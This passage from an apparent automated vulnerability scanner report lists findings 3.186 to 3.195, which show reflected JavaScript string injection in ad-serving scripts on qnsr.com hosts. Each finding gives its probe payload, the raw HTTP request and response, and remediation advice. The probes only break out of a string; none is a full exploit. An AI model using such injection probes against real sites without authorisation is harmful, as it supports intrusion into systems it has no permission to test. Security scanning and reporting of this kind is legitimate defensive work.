Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2591982
Expires: Mon, 28 Mar 2011 01:49:22 GMT
Date: Sat, 26 Feb 2011 01:49:40 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133c75eb';9d193661b16,203635133;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\
...[SNIP]...

3.186. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b1e'%3b09e5343efb0 was submitted in the REST URL parameter 8. This input was echoed as 48b1e';09e5343efb0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/20363513348b1e'%3b09e5343efb0//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:43 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,20363513348b1e';09e5343efb0;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; retur
...[SNIP]...

3.187. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9039'%3bec5d10b6574 was submitted in the REST URL parameter 9. This input was echoed as a9039';ec5d10b6574 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0a9039'%3bec5d10b6574/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0a9039';ec5d10b6574;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return tr
...[SNIP]...

3.188. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d7c'%3bafdedb92150 was submitted in the REST URL parameter 10. This input was echoed as f4d7c';afdedb92150 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//0/203f4d7c'%3bafdedb92150/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=0;n=203f4d7c';afdedb92150;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="window
...[SNIP]...

3.189. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78b07'%3b973a986fd5 was submitted in the REST URL parameter 11. This input was echoed as 78b07';973a986fd5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/954278b07'%3b973a986fd5//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1648
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:56 GMT
Date: Sat, 26 Feb 2011 01:49:56 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=0;n=203;s=954278b07';973a986fd5;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="window.status
...[SNIP]...

3.190. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92286'%3bdf5245fe92e was submitted in the REST URL parameter 4. This input was echoed as 92286';df5245fe92e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/2124892286'%3bdf5245fe92e/0/0/203687986/203687986//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2591978
Expires: Mon, 28 Mar 2011 01:49:11 GMT
Date: Sat, 26 Feb 2011 01:49:33 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=2124892286';df5245fe92e;c=203687986,203687986;i=0;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\';
...[SNIP]...

3.191. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c9'%3b8c6997a9eb5 was submitted in the REST URL parameter 7. This input was echoed as ff6c9';8c6997a9eb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986ff6c9'%3b8c6997a9eb5/203687986//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1667
Cache-Control: max-age=2591954
Expires: Mon, 28 Mar 2011 01:48:56 GMT
Date: Sat, 26 Feb 2011 01:49:42 GMT
Connection: close


var zzADS_CHAN = '203687986ff6c9';8c6997a9eb5';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.192. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c72d0'%3bb81f0cdff45 was submitted in the REST URL parameter 8. This input was echoed as c72d0';b81f0cdff45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986c72d0'%3bb81f0cdff45//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2591985
Expires: Mon, 28 Mar 2011 01:49:29 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986c72d0';b81f0cdff45;i=0;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseO
...[SNIP]...

3.193. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43d0c'%3b225d52bbf59 was submitted in the REST URL parameter 9. This input was echoed as 43d0c';225d52bbf59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//043d0c'%3b225d52bbf59/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=043d0c';225d52bbf59;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="
...[SNIP]...

3.194. http://e2.cdn.qnsr.com//cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5edfa'%3b1e8c5ab6679 was submitted in the REST URL parameter 7. This input was echoed as 5edfa';1e8c5ab6679 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20132865/1537/0/0/2036879845edfa'%3b1e8c5ab6679/203687984//0/203/9542//1000002/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1877
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:39 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '2036879845edfa';1e8c5ab6679';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.195. http://e2.cdn.qnsr.com//cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d45'%3b635acea8c54 was submitted in the REST URL parameter 7. This input was echoed as f4d45';635acea8c54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20135122/1793/0/0/203687991f4d45'%3b635acea8c54/203687991//0/203/9542//5000005/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
